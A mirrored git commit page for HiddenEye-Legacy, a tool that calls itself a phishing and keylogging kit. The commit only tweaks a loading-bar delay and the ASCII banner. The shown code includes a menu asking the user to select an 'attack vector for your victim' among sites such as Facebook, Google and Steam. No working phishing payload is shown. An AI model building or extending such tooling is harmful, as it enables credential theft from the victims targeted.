mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Some Row And Column Fixing.
This commit is contained in:
parent
6ea2f95869
commit
b0b9a745b6
|
@ -349,7 +349,7 @@ def runMainMenu(): #menu where user select what they wanna use
|
|||
print (_("{0}**{2} PHP NOT FOUND: \n {0}~{1} Please install PHP and run me again.http://www.php.net/").format(MAIN2, MAIN4, MAIN0))
|
||||
|
||||
for i in range(101):
|
||||
sleep(0.02)
|
||||
sleep(0.005)
|
||||
stdout.write("\r")
|
||||
stdout.write(_("{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait...{2}%").format(MAIN0, MAIN4, i))
|
||||
stdout.flush()
|
||||
|
@ -368,11 +368,10 @@ def mainMenu():
|
|||
{2} ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ ███████ {1}
|
||||
{2} ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ ██ {1}
|
||||
{2} ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ ███████ {1}
|
||||
|
||||
v{3}0{1}.{3}4{1}.{3}0{1} BY:DARKSEC{2}
|
||||
{3}[{1}v{3}0{1}.{3}4{1}.{3}0{3}]{1} BY:DARKSEC{2}
|
||||
{3}[{2} Modern Phishing Tool With Advanced Functionality {3}]
|
||||
{3}[{2} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {3}]
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~''').format(MAIN3, MAIN4, MAIN2, MAIN0))
|
||||
________________________________________________________________________________''').format(MAIN3, MAIN4, MAIN2, MAIN0))
|
||||
print (_("------------------------\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n------------------------").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}1{0}]{1} Facebook {0}[{1}13{0}]{1} Steam {0}[{1}25{0}]{1} Badoo {0}[{1}37{0}]{1} PlayStation").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}2{0}]{1} Google {0}[{1}14{0}]{1} VK {0}[{1}26{0}]{1} CryptoCurrency").format(MAIN0, MAIN2))
|
||||
|
|
Loading…
Reference in New Issue
Block a user